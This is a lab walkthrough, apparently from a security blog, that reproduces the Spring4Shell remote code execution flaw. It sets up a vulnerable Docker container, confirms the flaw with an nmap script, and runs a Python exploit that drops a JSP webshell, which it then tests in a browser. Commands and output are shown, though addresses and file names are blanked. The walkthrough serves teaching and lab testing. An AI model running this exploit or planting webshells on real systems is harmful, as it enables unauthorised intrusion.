As described by the Mitre CVE Database – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. Spring4Shell has affected a wide variety of vendors products including Cisco, VMware, Fortinet etc.

OK so lets get to labbing this one!
Disclaimer – never test on a production network. Always have permission. The following method is for a LAB environment only.

You will need a Linux VM capable of running Docker. Im using Ubuntu 20.x. Host IP for this example is
A secondary host to run the nmap scan (can be any OS as long as it supports nmap and the scripting engine). IP for my nmap host is

1. Install docker on your Ubuntu VM and run the Spring4Shell container pre made by reznok on Github:
sudo apt install
sudo docker build . -t spring4shell && sudo docker run -p 8080:8080 spring4shell

App will now be available at

2. Clone the Spring4Shell NSE from gpiechnik2 on Github
Save it to your scanning host. In this example I used Windows. Run it against the target to confirm the vulnerability:
Spring4Shell>nmap -v -sS --script=spring4shell.nse
Starting Nmap 7.92 ( ) at 2022-04-13 23:08 W. Australia Standard Time
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Scanning [1 port] Initiating SYN Stealth Scan at 23:08
Scanning [1000 ports] Discovered open port 8080/tcp on
Discovered open port 22/tcp on
Completed SYN Stealth Scan at 23:08, 0.07s elapsed (1000 total ports)
NSE: Script scanning
Initiating NSE at 23:08
Completed NSE at 23:08, 4.13s elapsed
Nmap scan report for
Host is up (0.00036s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open ssh
8080/tcp open http-proxy
| spring4shell:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| IDs: CVE:CVE-2022-22965
| Check results:
| Extra information:
| References:
MAC Address: 00:0C:29:5C:08:93 (VMware)

OK confirmed the host is vulnerable. Lets move on to the exploit.

3. Save the to your scanning host and execute with python (you may need to install python3 and pip the requests module):
C:\Spring4Shell>python .\ --url --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at:

4. Test the webshell in a browser. Use unicode for spaces (%20) etc:
Spring4Shell 1
Spring4Shell 2

Check the notes on the Spring Framework website here.
Spring4Shell was patched quickly due to the RCE nature of the vulnerability. Vendors that use the Spring Framework have released their own patches.